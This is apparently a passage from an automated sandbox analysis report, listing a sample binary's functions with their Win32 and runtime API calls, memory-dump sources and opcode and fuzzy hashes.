                                                                                                                            • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                                                            Function 00448C8B Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32 ref: 00448CB8
                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                                                                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 312131281-0
                                                                                                                            • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                            • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                                                                            • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                            • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                                                                            Function 004588B0 Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • select.WSOCK32 ref: 0045890A
                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                                                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00458927
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastacceptselect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 385091864-0
                                                                                                                            • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                            • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                                                                            • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                            • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                                                                            Function 00438D4E Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3850602802-0
                                                                                                                            • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                            • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                                                            • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                            • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                                                            Function 0043362D Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1358664141-0
                                                                                                                            • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                            • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                                                            • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                            • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                                                                            Function 0044419B Relevance: 6.1, APIs: 4, Instructions: 53synchronizationthreadwindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2880819207-0
                                                                                                                            • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                            • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                                                            • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                            • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                                                            Function 0043401C Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                                                            • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 357397906-0
                                                                                                                            • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                            • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                                                            • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                            • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                                                                            Function 00424E33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                            • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                                                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                            • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                                                                                            Function 00436A1D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __wsplitpath.LIBCMT ref: 00436A45
                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                            • __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                                            • __wcsicoll.LIBCMT ref: 00436A93
                                                                                                                            • __wcsicoll.LIBCMT ref: 00436AB0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1187119602-0
                                                                                                                            • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                            • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                                                                            • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                            • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                                                                            Function 00437AFE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1597257046-0
                                                                                                                            • Opcode ID: 9d58570e0328b0cf2166bcf5230b4d4f76ced30d7f4183b4fc8936074b496a0e
                                                                                                                            • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                                                                            • Opcode Fuzzy Hash: 9d58570e0328b0cf2166bcf5230b4d4f76ced30d7f4183b4fc8936074b496a0e
                                                                                                                            • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                                                                            Function 004555D6 Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteDestroyObject$IconWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3349847261-0
                                                                                                                            • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                            • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                                                                            • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                            • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                                                                            Function 0044B600 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2223660684-0
                                                                                                                            • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                            • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                                                                            • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                                                                            • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                                                                            Function 00447268 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                            • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                                                                            • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                                                                            • EndPath.GDI32(?), ref: 004472B0
                                                                                                                            • StrokePath.GDI32(?), ref: 004472BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2783949968-0
                                                                                                                            • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                            • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                                                                            • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                                                                            • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                                                                            Function 00417D0E Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 00417D1A
                                                                                                                              • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                              • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                            • __getptd.LIBCMT ref: 00417D31
                                                                                                                            • __amsg_exit.LIBCMT ref: 00417D3F
                                                                                                                            • __lock.LIBCMT ref: 00417D4F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3521780317-0
                                                                                                                            • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                                            • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                                                                            • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                                                                            • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                                                                            Function 00471144 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDesktopWindow.USER32 ref: 00471144
                                                                                                                            • GetDC.USER32(00000000), ref: 0047114D
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2889604237-0
                                                                                                                            • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                            • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                                                                            • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                                                                            • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                                                                                                            Function 00471102 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDesktopWindow.USER32 ref: 00471102
                                                                                                                            • GetDC.USER32(00000000), ref: 0047110B
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2889604237-0
